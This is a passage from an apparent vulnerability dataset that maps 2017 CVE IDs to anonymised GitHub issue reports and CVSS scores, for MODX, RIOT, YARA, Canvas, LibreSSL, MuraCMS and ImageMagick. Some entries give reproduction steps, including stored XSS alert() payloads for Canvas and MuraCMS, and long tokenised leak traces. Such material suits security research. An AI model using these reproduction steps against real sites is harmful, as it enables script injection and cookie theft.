  14511. "CVE_ID": "CVE-2017-8115",
  14512. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/13432",
  14513. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/13432",
  14514. "Repo_new": "modxcms/revolution",
  14515. "Issue_Created_At": "2017-04-21T15:59:20Z",
  14516. "description": "Directory traversal vulnerability in FILETAG , please confirm!. [ ] Summary Hello, i found a directory traversal vulnerability in FILETAG . The vulnerability is due to defects in processing search parameters. the reproduction is below: Step to reproduce Accessing the FILETAG in POST mode, the POST parameters are PATHTAG e.g. URL: FILETAG POST: PATHTAG Vulnerability details please refer to the following links: link: URLTAG pass: vbyp Observed behavior It will causes the system directory information to leak Expected behavior It will causes the system directory information to leak Environment MODX version NUMBERTAG",
  14517. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  14518. "severity": "MEDIUM",
  14519. "baseScore": 5.3,
  14520. "impactScore": 1.4,
  14521. "exploitabilityScore": 3.9
  14522. },
  14523. {
  14524. "CVE_ID": "CVE-2017-8289",
  14525. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/6840",
  14526. "Issue_Url_new": "https://github.com/riot-os/riot/issues/6840",
  14527. "Repo_new": "riot-os/riot",
  14528. "Issue_Created_At": "2017-04-01T10:14:27Z",
  14529. "description": "Stack Buffer Overflow Potential Denial of Service. I'd like to report a stack buffer overflow bug within RIOT without making it publicly known. I'm still doing some testing at the device level but a bug definitely exists, who is best to discuss with privately?",
  14530. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14531. "severity": "CRITICAL",
  14532. "baseScore": 9.8,
  14533. "impactScore": 5.9,
  14534. "exploitabilityScore": 3.9
  14535. },
  14536. {
  14537. "CVE_ID": "CVE-2017-8294",
  14538. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/646",
  14539. "Issue_Url_new": "https://github.com/virustotal/yara/issues/646",
  14540. "Repo_new": "virustotal/yara",
  14541. "Issue_Created_At": "2017-04-26T05:33:55Z",
  14542. "description": "Out of bounds read in APITAG Out of bounds read in APITAG Git HEAD: APITAG FILETAG Command: APITAG ASAN: ERRORTAG",
  14543. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  14544. "severity": "HIGH",
  14545. "baseScore": 7.5,
  14546. "impactScore": 3.6,
  14547. "exploitabilityScore": 3.9
  14548. },
  14549. {
  14550. "CVE_ID": "CVE-2017-8298",
  14551. "Issue_Url_old": "https://github.com/cnvs/canvas/issues/331",
  14552. "Issue_Url_new": "https://github.com/austintoddj/canvas/issues/331",
  14553. "Repo_new": "austintoddj/canvas",
  14554. "Issue_Created_At": "2017-04-23T00:11:49Z",
  14555. "description": "XSS vulnerability in creating Posts. Exploit Title: Stored XSS vulnerability possible in creating posts in canvas APITAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: XSS allows an attacker to run arbitrary scripts on the users browser. Exploit POC: APITAG used_: Chrome version NUMBERTAG Login as a user/ admin user NUMBERTAG Go to Posts > Add New NUMBERTAG The title and the content fields are vulnerable to stored XSS NUMBERTAG Enter APITAG alert('XSS in title') APITAG in the Title,'some subtitle' in subtitle and APITAG alert('XSS in content') APITAG in the content field NUMBERTAG Publish the post NUMBERTAG Now, navigate to the APITAG posts\" page. The script in the 'title' field will have executed and you will see an alert box with 'XSS in title NUMBERTAG Now go to the preview of this post by clicking on the magnifying glass next to the newly created post NUMBERTAG The script that we had entered in the content will now have executed and you will see an alert box with 'XSS in content'. References: URLTAG Screenshots: APITAG NUMBERTAG Creating a post. APITAG NUMBERTAG SS on APITAG posts\" page. APITAG NUMBERTAG Post created. APITAG NUMBERTAG SS on the post page. APITAG NUMBERTAG Post page. Impact: An attacker can execute arbitrary script on an unsuspecting user's browser. For instance Since, there is no seperation between the posts created by a privileged and an unprivileged user, an unprivileged user can create a post with script to steal the administrator's cookies or perform an action on his behalf. Mitigation: Input should be properly validated before storing in the database and output from the database should also be properly encoded before displaying it to the user.",
  14556. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14557. "severity": "MEDIUM",
  14558. "baseScore": 5.4,
  14559. "impactScore": 2.7,
  14560. "exploitabilityScore": 2.3
  14561. },
  14562. {
  14563. "CVE_ID": "CVE-2017-8301",
  14564. "Issue_Url_old": "https://github.com/libressl-portable/portable/issues/307",
  14565. "Issue_Url_new": "https://github.com/libressl/portable/issues/307",
  14566. "Repo_new": "libressl/portable",
  14567. "Issue_Created_At": "2017-04-25T17:16:04Z",
  14568. "description": "Some nginx TLS tests started failing with APITAG NUMBERTAG but not with NUMBERTAG After we updated APITAG from NUMBERTAG to NUMBERTAG in Alpine Linux, we have noticed that some TLS related tests in nginx (both NUMBERTAG and NUMBERTAG started failing. Moreover, most of them fail because nginx accepted certificate that should be rejected! That\u2019s pretty bad regression. We\u2019re not sure if the problem is in APITAG nginx or nginx tests, so reporting it to both. CODETAG Complete log: FILETAG /cc APITAG",
  14569. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N",
  14570. "severity": "MEDIUM",
  14571. "baseScore": 5.3,
  14572. "impactScore": 3.6,
  14573. "exploitabilityScore": 1.6
  14574. },
  14575. {
  14576. "CVE_ID": "CVE-2017-8302",
  14577. "Issue_Url_old": "https://github.com/blueriver/MuraCMS/issues/2577",
  14578. "Issue_Url_new": "https://github.com/blueriver/muracms/issues/2577",
  14579. "Repo_new": "blueriver/MuraCMS",
  14580. "Issue_Created_At": "2017-04-25T03:08:14Z",
  14581. "description": "Bug report: XSS Vulnerabilities in many arguments of APITAG Steps to reproduce NUMBERTAG Login to site management, for example FILETAG NUMBERTAG Access following URL, browser will run any scripts posted to server, for example: alert NUMBERTAG to prompt a dialog ERRORTAG ERRORTAG APITAG Environment Win7 Lucee NUMBERTAG windows Latest stable build (mura NUMBERTAG",
  14582. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14583. "severity": "MEDIUM",
  14584. "baseScore": 5.4,
  14585. "impactScore": 2.7,
  14586. "exploitabilityScore": 2.3
  14587. },
  14588. {
  14589. "CVE_ID": "CVE-2017-8343",
  14590. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/444",
  14591. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/444",
  14592. "Repo_new": "imagemagick/imagemagick",
  14593. "Issue_Created_At": "2017-04-26T16:41:24Z",
  14594. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fba NUMBERTAG ab NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fba4b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14595. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14596. "severity": "MEDIUM",
  14597. "baseScore": 6.5,
  14598. "impactScore": 3.6,
  14599. "exploitabilityScore": 2.8
  14600. },
  14601. {
  14602. "CVE_ID": "CVE-2017-8344",
  14603. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/446",
  14604. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/446",
  14605. "Repo_new": "imagemagick/imagemagick",
  14606. "Issue_Created_At": "2017-04-26T16:44:19Z",
  14607. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f9b NUMBERTAG f NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f9b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14608. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14609. "severity": "MEDIUM",
  14610. "baseScore": 6.5,
  14611. "impactScore": 3.6,
  14612. "exploitabilityScore": 2.8
  14613. },
  14614. {
  14615. "CVE_ID": "CVE-2017-8345",
  14616. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/442",
  14617. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/442",
  14618. "Repo_new": "imagemagick/imagemagick",
  14619. "Issue_Created_At": "2017-04-26T16:39:50Z",
  14620. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ada in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14621. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14622. "severity": "MEDIUM",
  14623. "baseScore": 6.5,
  14624. "impactScore": 3.6,
  14625. "exploitabilityScore": 2.8
  14626. },
  14627. {
  14628. "CVE_ID": "CVE-2017-8346",
  14629. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/440",
  14630. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/440",
  14631. "Repo_new": "imagemagick/imagemagick",
  14632. "Issue_Created_At": "2017-04-26T16:37:18Z",
  14633. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd4eda NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG e NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd4e8d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd4eda NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd4e8d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14634. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14635. "severity": "MEDIUM",
  14636. "baseScore": 6.5,
  14637. "impactScore": 3.6,
  14638. "exploitabilityScore": 2.8
  14639. },
  14640. {
  14641. "CVE_ID": "CVE-2017-8347",
  14642. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/441",
  14643. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/441",
  14644. "Repo_new": "imagemagick/imagemagick",
  14645. "Issue_Created_At": "2017-04-26T16:39:00Z",
  14646. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in 
APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG a2a in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f 
NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG 
APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG 
APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG 
in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG b7d in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG 
